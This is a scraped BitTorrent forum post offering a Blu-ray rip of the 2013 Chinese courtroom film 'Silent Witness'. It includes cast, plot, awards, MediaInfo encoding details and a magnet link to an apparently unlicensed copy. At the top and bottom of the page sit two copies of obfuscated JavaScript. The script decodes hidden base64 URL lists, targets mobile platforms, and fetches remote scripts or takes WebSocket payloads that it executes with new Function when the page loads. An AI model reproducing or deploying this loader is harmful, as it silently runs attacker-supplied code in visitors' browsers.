全民目击[国语配音/中文字幕].Silent.Witness.2013.1080p.BluRay.x265.10bit.DTS 5.14GB

版主小s 1月前 173

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 全民目击 / Silent Witness

◎年 代 2013

◎产 地 中国大陆

◎类 别 剧情 / 悬疑 / 犯罪

◎语 言 汉语普通话

◎上映日期 2013-09-13(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt3204696/

◎豆瓣评分 7.8/10 (297226人评价)

◎豆瓣链接 https://movie.douban.com/subject/11510624/

◎片 长 119分钟

◎导 演 非行 Fei Xing (id:1320824)

◎编 剧 非行 Fei Xing (id:1320824)

◎演 员 孙红雷 Honglei Sun (id:1053581)

余男 Nan Yu (id:1050430)

郭富城 Aaron Kwok (id:1041390)

邓家佳 Jiajia Deng (id:1274361)

赵立新 Lixin Zhao (id:1312817)

佟丽娅 Liya Tong (id:1275756)

倪虹洁 Hongjie Ni (id:1274649)

陈思诚 Sicheng Chen (id:1274763)

周韦彤 Cica Zhou (id:1275947)

廖晓琴 Xiaoqin Liao (id:1315475)

谭松韵 Songyun Tan (id:1318061)

丁子烁 Zishuo Ding (id:1363782)

李兰迪 Landy Li (id:1330228)

高大伟 Dawei Gao (id:1328992)

李沁谣 Maggie Lee (id:1322406)

罗悠月 Youyue Luo (id:1363645)

赵彦乔 Yanqiao Zhao (id:1356459)

李子游 Ziyou Li (id:1386175)

纪姿含 Zihan Ji (id:1342370)

李宗雷 Zonglei Li (id:1350373)

戴墨 Mo Dai (id:1324615)

张旭 Xu Zhang (id:1320543)

张羽 Yu Zhang (id:1323186)

郭东 Dong Guo (id:1339963)

谢天翔 Tianxiang Xie (id:1371076)

喻为星 Victor Yu (id:1375385)

许多 Xu Duo (id:1460863)

吕赢 Ying Lü (id:1386811)

杜笃之 Du-Che Tu (id:1275159)

◎标 签 悬疑 / 犯罪 / 孙红雷 / 中国电影 / 国产 / 郭富城 / 父爱 / 大陆

◎简 介

林泰(孙红雷 饰)是当地名噪一方的富豪,近来正筹备自己人生中的另一件大事,与钟爱多年的女友结婚。不料此时传来噩耗,准新娘被人杀死在公寓的地下停车场,林泰闻讯如雷击顶。警方把怀疑的目光瞄向了他的独女林萌萌(邓家佳 饰),检方提起诉讼后,林泰花重金聘请著名律师周莉(余男 饰)为其女辩护,周莉曾为诸多有名的案件做过代理人,对打赢这场官司信心满满,庭审前,做了大量案头工作。公诉方派出的则是大名鼎鼎的检察官童涛(郭富城 饰),他的公诉犀利坚锐、一语中的。庭审开始后,控辩双方剑拔驽张,火药味十足,但随着审理的进一步深入,罪案越发扑朔迷离,似进入一条看不到边际的死穴......

◎获奖情况 (共7项)

第30届中国电影金鸡奖 (2015)

最佳女配角

└──邓家佳 (id:1274361)

第32届大众电影百花奖 (2014)

最佳女主角(提名)

└──余男 (id:1050430)

最佳女配角

└──邓家佳 (id:1274361)

最佳新人(提名)

└──丁子烁 (id:1363782)

第4届豆瓣电影鑫像奖 (2014)

鑫豆单元 最佳影片(华语)(提名)

鑫豆单元 最佳导演(华语)(提名)

└──非行 (id:1320824)

鑫豆单元 最佳男演员(华语)(提名)

└──孙红雷 (id:1053581)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 244291696281640404573038239296527794878 (0xB7C8DE8AAAD980C4D969083A2D5402BE)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.13 GiB

  8. Duration : 1 h 54 min

  9. Overall bit rate : 6 395 kb/s

  10. Movie name : Silent Witness

  11. Encoded date : UTC 2021-10-24 03:03:50

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 54 min

  23. Bit rate : 4 841 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.129

  33. Stream size : 3.89 GiB (76%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 54 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.21 GiB (24%)

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. ID in the original source medium : 4609 (0x1201)

  59. Format : PGS

  60. Muxing mode : zlib

  61. Codec ID : S_HDMV/PGS

  62. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration : 1 h 47 min

  64. Bit rate : 38.8 kb/s

  65. Count of elements : 2989

  66. Stream size : 29.9 MiB (1%)

  67. Title : chs

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No

  71. Original source medium : Blu-ray


  72. Text #2

  73. ID : 4

  74. ID in the original source medium : 4608 (0x1200)

  75. Format : PGS

  76. Muxing mode : zlib

  77. Codec ID : S_HDMV/PGS

  78. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration : 1 h 47 min

  80. Bit rate : 39.6 kb/s

  81. Count of elements : 2991

  82. Stream size : 30.6 MiB (1%)

  83. Title : cht

  84. Language : Chinese

  85. Default : No

  86. Forced : No

  87. Original source medium : Blu-ray


  88. Text #3

  89. ID : 5

  90. ID in the original source medium : 4610 (0x1202)

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 47 min

  96. Bit rate : 50.8 kb/s

  97. Count of elements : 2991

  98. Stream size : 39.1 MiB (1%)

  99. Title : eng

  100. Language : English

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Menu

  105. 00:00:00.000 : en:Chapter 01

  106. 00:08:22.833 : en:Chapter 02

  107. 00:19:18.583 : en:Chapter 03

  108. 00:29:26.208 : en:Chapter 04

  109. 00:37:04.791 : en:Chapter 05

  110. 00:48:04.958 : en:Chapter 06

  111. 00:57:34.625 : en:Chapter 07

  112. 01:06:05.416 : en:Chapter 08

  113. 01:16:39.958 : en:Chapter 09

  114. 01:25:26.583 : en:Chapter 10

  115. 01:35:38.708 : en:Chapter 11

  116. 01:44:18.833 : en:Chapter 12


TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:0A190B761D17BFF553AE6E7E62C9D8CE5BDBC1E5

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};